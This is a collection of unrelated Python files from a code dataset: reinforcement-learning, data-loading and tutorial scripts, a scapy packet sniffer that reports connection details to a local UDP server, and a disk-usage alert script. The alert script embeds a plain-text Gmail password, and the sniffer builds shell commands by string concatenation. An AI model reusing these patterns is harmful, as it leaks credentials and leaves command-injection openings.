Q_expected = self.critic(states_tensor, actions_tensor)\n        critic_loss = F.mse_loss(Q_expected, Q_targets)\n        # Minimize the loss\n        self.critic_optimizer.zero_grad()\n        critic_loss.backward()\n        self.critic_optimizer.step()\n\n        # ---------------------------- update actor ---------------------------- #\n        # Compute actor loss\n        actions_pred = [self.actor(state) for state in states] \n        actions_pred_tensor = torch.cat(actions_pred, dim=1).to(device)\n        actor_loss = -self.critic(states_tensor, actions_pred_tensor).mean()\n        # Minimize the loss, thereby maximizing the reward\n        self.actor_optimizer.zero_grad()\n        actor_loss.backward()\n        self.actor_optimizer.step()\n\n        # ----------------------- update target networks ----------------------- #\n        self.soft_update(self.critic, self.target_critic, TAU)\n        self.soft_update(self.actor, self.target_actor, TAU) \n\n\n    def soft_update(self, local_model, target_model, tau):\n        \"\"\"Soft update model parameters.\n        θ_target = τ*θ_local + (1 - τ)*θ_target\n        Params\n        ======\n            local_model: PyTorch model (weights will be copied from)\n            target_model: PyTorch model (weights will be copied to)\n            tau (float): interpolation parameter \n        \"\"\"\n        for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):\n            target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)\n\n\n    def reset(self):\n        self.noise.reset() \n\n\n    def copy_weights(self, source, target):\n        \"\"\"Copies the weights from the source to the target\"\"\"\n        for target_param, source_param in zip(target.parameters(), source.parameters()):\n            target_param.data.copy_(source_param.data)\n","sub_path":"MADDPG.py","file_name":"MADDPG.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"135642075","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nf = open(\"../data/CURVES_FeGaPd.txt\", \"r\")\n\ndata = f.read().split(\"\\n\")\nf.close()\n\nt = data[0].split(\" \")[1:]\n\nt = [float(x) for x in t]\nt = np.array(t)\nt = (t - t[0]) / (t[t.size-1] - t[0])\narray_of_curves = []\ni = 1\nwhile i < len(data):\n    temp = data[i].split(\" \")[1:]\n    temp = [float(x) for x in temp]\n    temp = np.array(temp)\n    temp = (temp - temp.min())\n    temp = temp / (temp.max())\n    array_of_curves.append(temp)\n    i = i + 1\narray_of_curves = np.array(array_of_curves)\ntemp = array_of_curves[0]\ngradient1 = np.gradient(temp, t)\ngradient1[gradient1 == 0] = 1\nsrvf1 = gradient1 / np.sqrt(np.abs(gradient1))\nsrvf1 = (srvf1 - srvf1.min()) 
/ (srvf1.max() - srvf1.min())\nfig, ax = plt.subplots()\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['bottom'].set_color('#FFFFFF')\nax.spines['left'].set_color('#FFFFFF')\nplt.plot(t, srvf1, \"#FC5C5C\")\nax.set_xticks([])\nax.set_yticks([])\nplt.savefig(\"SRVF\", transparent=True)\n\n\nplt.show()","sub_path":"testing/old/material_curve_visualiser.py","file_name":"material_curve_visualiser.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"357125303","text":"from scapy3k.all import *\nimport socket\nfrom subprocess import Popen\nimport json\nfrom urllib.request import urlopen\nfrom ipaddress import ip_address\nfrom threading import Thread\nfrom re import findall\n\nGET_COUNTRY = \"http://ip-api.com/json/\"\nSERVER_IP = \"127.0.0.1\"\nNUMBER_OF_SNIFFING_ROUNDS = 1\nSERVER_PORT = 8814\nSELF_IP = socket.gethostbyname(socket.gethostname())\nCMD_COMMAND = \"netstat -on\"\nWEB_SERVER_IP = \"54.71.128.194\"\n\nSOC = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nSERVER_ADDR = (SERVER_IP, SERVER_PORT)\n\n#the \"cache\" to make sure the same IP isn't checked twice\ncountrys = {}\n\n\ndef main():\n while True:\n sniff(count=NUMBER_OF_SNIFFING_ROUNDS, lfilter=fltr, prn=for_packet)\n\n\ndef fltr(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: True if the packet contain an IP and TCP or UDP layer AND the packet is not from a private network\n \"\"\"\n try:\n return IP in packet and (UDP in packet or TCP in packet) and\\\n not ip_address(get_ip(packet)).is_private and\\\n get_ip(packet) != WEB_SERVER_IP\n except:\n return False #if for some reason this check crashes, oddities, it means i don't want this packet\n\n\ndef for_packet(packet):\n \"\"\"\n Function will print out the ip directions of the packet, for convinience, and will start the proccessing thread\n :param packet: the packet object that i'm checking for\n :return: None\n \"\"\"\n proccessing_thread = Thread(target=process_packet_and_send, args=(packet,))\n proccessing_thread.start()\n try:\n return packet[IP].src + \" ---> \"+packet[IP].dst\n except:\n return \"An error has accoured\"\n\n\ndef is_entering(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: weather or not the packet is entering the pc or not\n \"\"\"\n if packet[IP].src != SELF_IP:\n return True\n else:\n return False\n\n\ndef get_ip(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: The ip in the packet that does not belong to me, IE the ip that i'm talking with\n \"\"\"\n if is_entering(packet):\n return packet[IP].src\n else:\n return packet[IP].dst\n\n\ndef get_country(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: the country that the hosts the ip i'm talking with\n \"\"\"\n #while you probobly can do it without it being global, it's far easier this way\n global countrys\n if get_ip(packet) in countrys.keys():\n return countrys[get_ip(packet)]\n else:\n res = json.loads(urlopen(GET_COUNTRY + get_ip(packet)).read().decode('utf-8'))\n try:\n countrys[get_ip(packet)] = res[\"country\"]\n except:\n countrys[get_ip(packet)] = \"Unknown\"\n return countrys[get_ip(packet)]\n\n\ndef get_partner_port(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: the DST port of the packet\n \"\"\"\n if is_entering(packet):\n return packet.sport\n else:\n return 
packet.dport\n\n\ndef get_port(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: the internal port of the packet\n \"\"\"\n if is_entering(packet):\n return packet.dport\n else:\n return packet.sport\n\n\ndef get_program(packet):\n \"\"\"\n :param packet: the packet object that i'm checking for\n :return: the program that the packet belongs to\n \"\"\"\n port = str(get_port(packet))\n process = Popen(CMD_COMMAND, shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n output, error = process.communicate()\n output= output.decode()\n results = findall(port+\" +[\\d\\.]+:\\d+ +[A-Z]+ +(\\d+)\", output)\n try:\n process = Popen(\"tasklist | findstr /c:\"+results[0], shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n program = process.communicate()[0].decode()\n results = findall(\".+\\.exe\",program)\n return results[0]\n except:\n pass\n return \"Unknown\"\n#there are 2 cases in which it will be unknown,\n#one is when the src port of the packet is not found amongst the list of netstat\n#two is for oddities\n\n\ndef process_packet_and_send(packet):\n proccessed = {\"ip\": get_ip(packet),\n \"country\": get_country(packet),\n \"entering\": is_entering(packet),\n \"port\": get_partner_port(packet),\n \"size\": packet[IP].len, #the len of the ip layer is the len of the entire packet\n \"program\": get_program(packet)}\n\n message = json.dumps((SELF_IP, [proccessed]))\n SOC.sendto(message.encode(), SERVER_ADDR)\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"expiriment agent.py","file_name":"expiriment agent.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"219803622","text":"import os\nimport numpy as np\nimport torch.utils.data as torch_data\nimport lib.utils.calibration as calibration\nimport lib.utils.kitti_utils as kitti_utils\nimport lib.utils.object3d as object3d\nfrom PIL import Image\nimport glob\n\n\nclass KittiTrackingDataset(torch_data.Dataset):\n def __init__(self, root_dir, split='train'):\n self.split = split\n is_test = self.split == 'test'\n # self.imageset_dir = os.path.join(root_dir, 'KITTI', 'object', 'testing' if is_test else 'training')\n self.imageset_dir = os.path.join(root_dir, 'KITTI_TRACKING', 'object', 'testing' if is_test else 'training')\n\n # split_dir = os.path.join(root_dir, 'KITTI', 'ImageSets', split + '.txt')\n # self.image_idx_list = [x.strip() for x in open(split_dir).readlines()]\n # self.num_sample = self.image_idx_list.__len__()\n self.video_idx_list, self.image_count_list, self.image_name_list = self.get_image_count_list(self.imageset_dir)\n # print(self.image_idx_list[0])\n self.image_idx_list = ['%06d' % idx for idx in range(np.sum(self.image_count_list))]\n self.num_sample = np.sum(self.image_count_list)\n\n self.image_dir = os.path.join(self.imageset_dir, 'image_02')\n self.lidar_dir = os.path.join(self.imageset_dir, 'velodyne')\n self.calib_dir = os.path.join(self.imageset_dir, 'calib')\n self.label_dir = os.path.join(self.imageset_dir, 'label_02')\n self.plane_dir = os.path.join(self.imageset_dir, 'planes')\n\n def convert_idx(self, idx):\n image_count_cumsum = np.cumsum(self.image_count_list)\n # print(image_count_cumsum)\n for i in range(len(image_count_cumsum)):\n if idx >= image_count_cumsum[i]:\n continue\n\n else:\n if i == 0:\n frame_id_in_video = idx\n else:\n frame_id_in_video = idx - image_count_cumsum[i-1]\n frame_id = 
self.image_name_list[i][frame_id_in_video] # string\n video_id = self.video_idx_list[i] # string\n break\n\n return video_id, frame_id\n\n def get_image_count_list(self, imageset_dir):\n video_idx_list = sorted(glob.glob(imageset_dir + '/velodyne/*/'))\n image_name_list = []\n # print(video_idx_list)\n folder_idx_list = []\n image_count_list = []\n for dir_name in video_idx_list:\n folder_idx_list.append(os.path.basename(os.path.normpath(dir_name))) # e.g. 0000\n image_idx_in_video = sorted(glob.glob(dir_name + '/*'))\n image_name_list.append([os.path.splitext(os.path.basename(image_name))[0] for image_name in image_idx_in_video]) # e.g. 000000\n image_count_list.append(len(image_idx_in_video)) # e.g. 154\n \n return folder_idx_list, image_count_list, image_name_list\n\n def get_image(self, idx):\n assert False, 'DO NOT USE cv2 NOW, AVOID DEADLOCK'\n import cv2\n # cv2.setNumThreads(0) # for solving deadlock when switching epoch\n img_file = os.path.join(self.image_dir, '%06d.png' % idx)\n assert os.path.exists(img_file), img_file\n return cv2.imread(img_file) # (H, W, 3) BGR mode\n\n def get_image_shape(self, idx):\n video_id, frame_id = self.convert_idx(idx)\n img_file = os.path.join(self.image_dir, video_id, frame_id+'.png')\n # img_file = os.path.join(self.image_dir, '%06d.png' % idx)\n assert os.path.exists(img_file), img_file\n im = Image.open(img_file)\n width, height = im.size\n return height, width, 3\n\n def get_lidar(self, idx):\n video_id, frame_id = self.convert_idx(idx)\n lidar_file = os.path.join(self.lidar_dir, video_id, frame_id+'.bin')\n # lidar_file = os.path.join(self.lidar_dir, '%06d.bin' % idx)\n assert os.path.exists(lidar_file), lidar_file\n return np.fromfile(lidar_file, dtype=np.float32).reshape(-1, 4)\n\n def get_calib(self, idx):\n video_id, _ = self.convert_idx(idx)\n calib_file = os.path.join(self.calib_dir, video_id+'.txt')\n assert os.path.exists(calib_file), calib_file\n return calibration.Calibration(calib_file)\n\n def get_label(self, idx):\n video_id, frame_id = self.convert_idx(idx)\n label_file = os.path.join(self.label_dir, video_id+'.txt')\n assert os.path.exists(label_file), label_file\n # return kitti_utils.get_objects_from_label(label_file)\n return self.get_label_with_frame_id(label_file, frame_id)\n\n def get_label_with_frame_id(self, label_file, frame_id):\n if isinstance(frame_id, str):\n frame_id = int(frame_id)\n\n with open(label_file, 'r') as f:\n lines = f.readlines()\n\n objects = []\n \n for line in lines:\n label = line.strip().split(' ')\n line_frame_id = int(label[0])\n if line_frame_id == frame_id:\n objects.append(object3d.Object3d(\" \".join(label[2:])))\n\n return objects\n\n def get_road_plane(self, idx):\n assert False, 'WE DONNOT HAVE ROAD PLANE DATA'\n plane_file = os.path.join(self.plane_dir, '%06d.txt' % idx)\n with open(plane_file, 'r') as f:\n lines = f.readlines()\n lines = [float(i) for i in lines[3].split()]\n plane = np.asarray(lines)\n\n # Ensure normal is always facing up, this is in the rectified camera coordinate\n if plane[1] > 0:\n plane = -plane\n\n norm = np.linalg.norm(plane[0:3])\n plane = plane / norm\n return plane\n\n def __len__(self):\n raise NotImplementedError\n\n def __getitem__(self, item):\n raise NotImplementedError\n","sub_path":"lib/datasets/kitti_tracking_dataset.py","file_name":"kitti_tracking_dataset.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"208587478","text":"import numpy as np\nfrom 
scipy import stats\nimport scipy\nimport math\n\n# if data is not a frequency distribution\nx = np.array([1,2,3,4,5])\nmean = np.mean(x)\nn = x.size\nx_minus_mean= x-mean\nx_minus_mean_square = np.square(x_minus_mean)\nx_minus_mean_square_sum = np.sum(x_minus_mean_square)\n\nstandard_deviation = math.sqrt(x_minus_mean_square_sum/n)\nprint(\"standard_deviation 1 : \",standard_deviation)\n\n# if dataset is frequency distribution\nx_square = np.square(x)\nf = np.array([6,16,24,25,19])\ncum_freq = np.array([6,22,46,71,90])\nf_x_square = f*x_square\n\nsum_f_x_square = np.sum(f_x_square)\nsum_f = np.sum(f)\nmean_square = math.pow(mean,2)\nstandard_deviation = math.sqrt((sum_f_x_square/sum_f) - mean_square)\n\nprint(\"standard_deviation 2 : \",standard_deviation)","sub_path":"Statistics/standard_deviation.py","file_name":"standard_deviation.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"347054612","text":"import numpy as np\nimport cv2\nimport tensorflow as tf\n\nglobal loaded_model, graph\n\n# Load json and create model\n\njson_file = open('model.json', 'r')\nloaded_model_json = json_file.read()\njson_file.close()\n\nfrom keras.models import model_from_json\nloaded_model = model_from_json(loaded_model_json)\n\n# Load weights into new model\n\nloaded_model.load_weights(\"model.h5\")\nloaded_model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\ngraph = tf.get_default_graph()\n\n# Predicting the class of a new image\n\npred = \"name_of_image.jpg\"\nimg = cv2.imread(pred)\nimg = cv2.resize(img,(64,64))\nimg = np.reshape(img,[1,64,64,3])\nwith graph.as_default(): \n classes = loaded_model.predict_classes(img)\n res = ''\n if classes[0]==0:\n res = 'cat'\n else:\n res = 'dog'\n print(res)\n","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"592551644","text":"\"\"\"\nThe collections module has a handy tool called defaultdict. The defaultdict is a subclass of Python’s dict that\naccepts a default_factory as its primary argument. The default_factory is usually a Python type, such as int or list,\nbut you can also use a function or a lambda too.\n\nIt’s basically impossible to cause a KeyError to happen as long as you set the default_factory to something that makes\nsense.\n\"\"\"\nfrom collections import defaultdict\n\n# Assume we have no Counter collection and we want to create a frequency distribution of the words appearing in a list\nfrequency_distribution = {}\nwords = ['gaurav', 'keswani', 'gaurav', 'yelp', 'snowflake', 'yelp', 'gaurav']\nfor word in words:\n # If the word is already present in the dictionary, increment the count by 1\n if word in frequency_distribution:\n frequency_distribution[word] += 1\n # If the word is not present in the dictionary, set the count to 1 since this is the first occurence\n else:\n frequency_distribution[word] = 1\nprint(frequency_distribution)\n\n# We can simplify the above process by using default dicts\n# Here we specify the default value type of the dict to be int. Thus, the default value of any key will be the default\n# value of type int i.e. 0\nfrequency_distribution = defaultdict(int)\nfor word in words:\n # The first time a word is encountered, it won't be in the dictionary. 
Thus, it frequency_distribution[word] will\n # have the value of 0 and will get 1 added to it.\n # Thus, the defaultdict will automatically assign zero as the value to any key it doesn’t already have in it\n frequency_distribution[word] += 1\nprint(frequency_distribution)\n\n\n","sub_path":"advanced_collections/defaultdict.py","file_name":"defaultdict.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"123261089","text":"print('importing..')\nimport numpy as np\nimport sys\nfrom Bio import SeqIO\nfrom pyseqdist import hamming\n\n\ndef getseqs(input): #get sequences from 2 files\n seqs=[]\n input_handle = open(input) \n for record in SeqIO.parse(input_handle, \"fasta\"): # for FASTQ use \"fastq\", for fasta \"fasta\"\n if len(record.seq) > 0 and len(record.seq) < 50000:\n seqs.append(record.seq)\n input_handle.close()\n return seqs\n\ndef calcDistanceMatrix(seqs1,seqs2): #calculate distance matrix from the 1-step list\n hdist=hamming(seqs1,seqs2,ignore_gaps=False)\n l=len(seqs1)\n w=len(seqs2)\n arr=np.zeros([l,w])\n for id in range(len(hdist)):\n item=hdist[id]\n arr[:,id]=item[:,0]\n return arr\n \nif __name__==\"__main__\":\n seqs1=getseqs(sys.argv[1])\n seqs2=getseqs(sys.argv[2])\n print('calculating...')\n array=calcDistanceMatrix(seqs1,seqs2)\n val=np.amin(array)\n print(array)\n print(val)\n","sub_path":"findMinimumHDist2Fastas.py","file_name":"findMinimumHDist2Fastas.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"53155908","text":"#!/usr/bin/python3\nimport os\nimport sys\nimport argparse\nimport paramiko\nimport smtplib, ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom datetime import datetime, date\nfrom pathlib import Path\n\ndef get_du_stats(host):\n\n global df_out\n try:\n #cert = paramiko.RSAKey.from_private_key_file(\"tkoulech-ohio.pem\")\n cert = paramiko.RSAKey.from_private_key_file(\"tkoulech-ca.pem\")\n c = paramiko.SSHClient()\n c.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n # print(\"connecting to {}...\".format(host))\n #c.connect( hostname = host, username = \"ubuntu\", pkey = cert )\n c.connect( hostname = host, username = \"ec2-user\", pkey = cert )\n # print(\"connected!!!\")\n stdin, stdout, stderr = c.exec_command('df -h')\n df_out = stdout.readlines()[1:]\n c.close()\n\n except:\n print(\"Connection to {} Failed!!!\".format(host))\n df_out = []\n\n flagSystem = False\n #TK stream = os.popen('ssh -i \"tkoulech-ohio.pem\" -o ConnectTimeout=10 ubuntu@{} \\'df -h\\''.format(host))\n # df_out is empty if connection timed out\n #TK df_out = stream.read().splitlines()[1:]\n\n pDict[host] = []\n if df_out:\n for p in df_out:\n pArray = p.rstrip().split()\n usage, part = pArray[len(pArray) - 2], pArray[len(pArray) - 1]\n #if 80 < int(usage.rstrip('%')) < 89:\n if 40 < int(usage.rstrip('%')) < 60:\n status = 'prewarning'\n flagSystem = True\n prewarnHosts.add(host)\n elif int(usage.rstrip('%')) > 90:\n status = 'warning'\n flagSystem = True\n warnHosts.add(host)\n else:\n status = 'ok'\n\n # constract a dictionary with 'host' as a key and list of tuples as value\n pDict[host].append((part, usage, status))\n\n # constract list of OK hosts: ssh didn't fail and they do not have either pre-warning or warning partitions\n if df_out and not flagSystem: okHosts.append(host)\n if not df_out: notreachableHosts.append(host)\n 
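    # pDict maps each host to a list of (partition, usage, status) tuples; an empty list means df output could not be read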
return pDict\n\ndef cur_du_all(pDict):\n for h in pDict.keys():\n if pDict[h]:\n print(\"\\t -> Current Dist Usage for {}\".format(h))\n for part,usage,status in pDict[h]:\n print('\\t', f'{part:30} is at {usage}')\n print(\"\")\n\n\ndef warn_du(pDict):\n text_msg = ''\n for h in pDict.keys():\n if pDict[h]:\n print(\"\\t -> {}: critical disk usage\".format(h))\n text_msg += '''\\n\\t -> {}: critical disk usage'''.format(h)\n for part,usage,status in pDict[h]:\n if status == 'warning':\n text_msg += '''\\n\\t {:30} is at {}'''.format(part, usage)\n print('\\t', f'{part:30} is at {usage}')\n print(\"\")\n return text_msg\n\n\ndef prewarn_du(pDict):\n text_msg = ''\n for h in pDict.keys():\n if pDict[h]:\n print(\"\\t -> {}: pre-warning disk usage\".format(h))\n LF.write(\"\\t -> {}: pre-warning disk usage\\n\".format(h))\n text_msg += '''\\n\\t -> {}: pre-warning disk usag'''.format(h)\n for part,usage,status in pDict[h]:\n if status == 'prewarning':\n text_msg += '''\\n\\t {:30} is at {}'''.format(part, usage)\n print('\\t', f'{part:30} is at {usage}')\n LF.write(\"\\t{0:30} is at {1}\\n\".format(part, usage))\n\n print(\"\")\n return text_msg\n\nif __name__ == '__main__':\n okHosts = []\n notreachableHosts = []\n prewarnHosts = set()\n warnHosts = set()\n pDict = {}\n text_msg = ''\n\n parser = argparse.ArgumentParser(description=\"Servers list\")\n parser.add_argument('-s', '--sspec', dest='sspec', metavar='server_spec', required=True, help='path to a server spec file')\n args = parser.parse_args()\n sspec = args.sspec\n\n #servers = '/home/ubuntu/monitoring/servers.txt'\n #servers = '/home/ec2-user/scripts/servers.txt'\n\n\n # check if 'servers' file exists and valid\n if not os.path.isfile(sspec):\n sys.exit(\"server's specification file {} is not valid\".format(sspec))\n\n now = datetime.now()\n current_time = now.strftime(\"%H%M%S\")\n today = date.today()\n current_date = today.strftime(\"%Y%m%d\")\n\n\n for host in open(sspec).read().splitlines():\n pDict = get_du_stats(host)\n\n # create log dir and logfiles\n logDir = '/home/ec2-user/UsageLogDir'\n logFile = 'serversUsage' + '_' + current_date + '_' + current_time\n logFilePath = os.path.join(logDir, logFile) \n print(\"logFile: \", logFilePath)\n if os.path.exists(logDir):\n if os.path.isfile(logDir):\n os.rename(\"{0}\".format(logDir), \"{0}.renamed_{1}_{2}\".format(logDir, current_date, current_time))\n os.makedirs(logDir)\n else:\n os.makedirs(logDir)\n\n LF = open(logFilePath, 'a')\n # with open (logFilePath, 'a') as LF:\n LF.write(\"Servers checked on {} {}:\\n\".format(current_date, current_time))\n # items from the file can be read differently\n # https://realpython.com/read-write-files-python/\n ### var 1\n for srv in Path(sspec).read_text().splitlines():\n LF.write(\"\\t {}\\n\".format(srv))\n\n ### var 2\n #for srv in list(open(sspec)):\n # LF.write(\"\\t {}\".format(srv))\n\n ### var 3\n #with open(sspec) as reader:\n # for srv in reader.readlines():\n # LF.write(\"\\t {}\".format(srv))\n\n # test dump full report\n # for x in pDict:\n # LF.writelines(\"{}: {}\\n\".format(x, pDict[x]))\n \n # Report hosts that timed out on ssh\n if notreachableHosts:\n # log non-reachable hosts\n LF.write(\"*** Servers are not reachable ***\\n\")\n print(\"*** Servers are not reachable ***\")\n text_msg += '''\\n\\n*** Servers are not reachable ***'''\n for h in notreachableHosts:\n print('\\t -> ssh connection timed out on ', h)\n LF.write(\"\\t -> ssh connection timed out on {}\\n\".format(h))\n text_msg += '''\\n\\t -> ssh 
connection timed out on {}'''.format(h)\n print(\"\")\n\n\n # Report hosts in Pre-Warning level\n if prewarnHosts:\n text_msg += '''\n\n*** PRE-WARNING: Servers with partitions at pre-warning level ***'''\n LF.write(\"*** PRE-WARNING: Servers with partitions at pre-warning level ***\\n\")\n print(\"*** PRE-WARNING: Servers with partitions at pre-warning level ***\")\n text_msg += prewarn_du(pDict)\n print(\"\")\n\n # Report hosts in Warning level\n if warnHosts:\n print(\"*** WARNING: Servers with partitions at a critical level ***\")\n text_msg += '''\n\n*** WARNING: Servers with partitions at a critical level ***'''\n text_msg += warn_du(pDict)\n print(\"\")\n\n # current disk usage for all hosts\n print(\"*** Servers disk usage ***\")\n cur_du_all(pDict)\n print(\"\")\n\n # Report hosts that are okay (no pre-warn, warn partitions)\n if okHosts:\n print(\"*** Servers with normal disk space usage ***\")\n for h in okHosts:\n print('\\t', h)\n\n\n if warnHosts or prewarnHosts or notreachableHosts:\n s_email = 'tiadevops@gmail.com'\n gmailpassword = 'tiadevops2020'\n r_email = 'tiadevops@gmail.com'\n port = 465 # For SSL\n smtp_server = \"smtp.gmail.com\"\n msg = MIMEMultipart(\"alternative\")\n msg['Subject'] = f'!!!Alert!!!: Disk usage report {current_date}_{current_time}'\n msg['From'] = 'tiadevops@gmail.com'\n msg['To'] = 'tiadevops@gmail.com'\n\n # Turn these into plain/html MIMEText objects\n part1 = MIMEText(text_msg, \"plain\")\n msg.attach(part1)\n\n # use create_default_context() from the ssl module. This will load the system’s trusted CA certificates,\n # enable host name checking and certificate validation,\n # and try to choose reasonably secure protocol and cipher settings.\n context = ssl.create_default_context()\n # Start an SMTP connection that is secured from the beginning using SMTP_SSL()\n with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n server.login(s_email, gmailpassword)\n server.sendmail(s_email, r_email, msg.as_string())\n # print(\" \\n Sent!\")\n\n LF.close()\n sys.exit(0)\n","sub_path":"current_usage_report.py","file_name":"current_usage_report.py","file_ext":"py","file_size_in_byte":8502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"249593984","text":"import string\n\na = input(\"enter a number: \")\n\nwhile (a):\n test=a[-1]\n a=a[0:-1]\n if test in a:\n print (\"the number is not pandigital\")\n break\nif not a:\n print (\"the number is pandigital\") ","sub_path":"PYTHON/IT/test/pandigital_blunt.py","file_name":"pandigital_blunt.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"57660697","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import division\n\nimport os\nimport sys\nimport traceback\nimport unittest\n\nLIB_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nif not LIB_PATH in sys.path:\n sys.path.append(LIB_PATH)\nfrom common.mods import Mods\nfrom common.message import Message\nfrom common.settings import Settings\nfrom common.base_test_case import BaseTestCase\n\n\nclass TestMessage(BaseTestCase):\n test_mod = Mods.Message\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Whether wifi is on or off does not affect this test\"\"\"\n super(TestMessage, cls).setUpClass()\n mdevice = \"MDEVICE\"\n sdevice = \"SDEVICE\"\n # mdevice = \"GAWKFQT8WGL7L7S8\"\n # sdevice = \"3dd7a889\"\n cls.mod = Message(mdevice, cls.test_mod, sdevice)\n cls.set = Settings(cls.mod.device, 
\"Settings\")\n cls.is_multi = True if cls.mod.config.site == \"US\" else False\n\n # @unittest.skip(\"debug\")\n def testStability3G(self):\n \"\"\"\n send draft case is invalid, new message will not save as draft.\n :return:\n \"\"\"\n if self.set.get_carrier_service_num() == \"10086\":\n self.set.logger.info(\"you are using CMCC sim card, using 4G instead of 3G test cases\")\n self.set.switch_network_for_multi_menus(\"ALL\")\n else:\n self.set.switch_network_for_multi_menus(\"3G\")\n self.case_forward_msg('SMS', int(self.dicttesttimes.get(\"SMS3G\".lower(), 0)))\n\n # @unittest.skip(\"debug\")\n def testStabilityLTE(self):\n \"\"\"\n send draft case is invalid, new message will not save as draft.\n :return:\n \"\"\"\n self.set.switch_network_for_multi_menus(\"ALL\")\n self.case_forward_msg('SMS', int(self.dicttesttimes.get(\"SMSLTE\".lower(), 0)))\n self.case_forward_msg('MMS', int(self.dicttesttimes.get(\"MMSLTE\".lower(), 0)))\n\n def case_forward_msg(self, msg_type, times=1):\n \"\"\"case function, forward message case.\n arg: msg_type(str) -- sms or mms.\n check forward msg results\n \"\"\"\n msg_receiver = self.mod.sdevice_tel if self.is_multi else self.mod.get_carrier_service_num()\n self.mod.logger.debug(\"Send %s %s times.\" % (msg_type, times))\n self.mod.enter_new()\n for loop in range(times):\n try:\n if self.mod.fwd_msg(msg_type, msg_receiver):\n self.trace_success()\n else:\n self.trace_fail()\n self.mod.delete_extra_msg()\n except:\n self.mod.logger.warning(traceback.format_exc())\n self.mod.save_fail_img()\n finally:\n self.mod.device.delay()\n self.mod.back_to_message()\n self.mod.back_to_home()\n self.mod.logger.debug(\"Send %s Msg Test complete.\" % msg_type)\n\n def quickReplyMsg(self, times):\n \"\"\"case function, answer s-device message during play music\n check receive、answer message and back to music results\n \"\"\"\n self.mod.logger.debug(\"Quick reply during music %d times.\" % times)\n self.mod.music.play_music()\n for loop in range(times):\n try:\n if self.mod.s_send_msg(loop) and self.mod.answer_musicing(loop):\n self.trace_success()\n else:\n self.trace_fail()\n except:\n self.mod.logger.warning(traceback.format_exc())\n self.mod.save_fail_img()\n self.mod.back_to_home()\n self.mod.back_to_home_s()\n self.mod.music.close_music()\n self.mod.logger.debug(\"Quick reply during music %d times completed.\" % times)\n\n\nif __name__ == '__main__':\n suite1 = unittest.TestLoader().loadTestsFromTestCase(TestMessage)\n suite = unittest.TestSuite([suite1])\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"MILAN_MTBF/stability/04_Messaging.py","file_name":"04_Messaging.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"305168038","text":"from django.conf.urls import url\nfrom .views import (\n ProfileDetailView,\n RecipeBooksListView,\n ProfileUpdateView,\n follow_view,\n FollowingListView,\n FollowersListView,\n)\n\nurlpatterns = [\n url(r'p/(?P\\w+)$', ProfileDetailView.as_view(), name='profile'),\n url(r'p/(?P\\w+)/following$',\n FollowingListView.as_view(),\n name='following_list'),\n url(r'p/(?P\\w+)/followers$',\n FollowersListView.as_view(),\n name='followers_list'),\n url('recipebooks/(?P\\w+)',\n RecipeBooksListView.as_view(),\n name='profile_recipebooks'),\n url('edit$', ProfileUpdateView.as_view(), name='edit_profile'),\n url('follow/(?P\\w+)$', follow_view, 
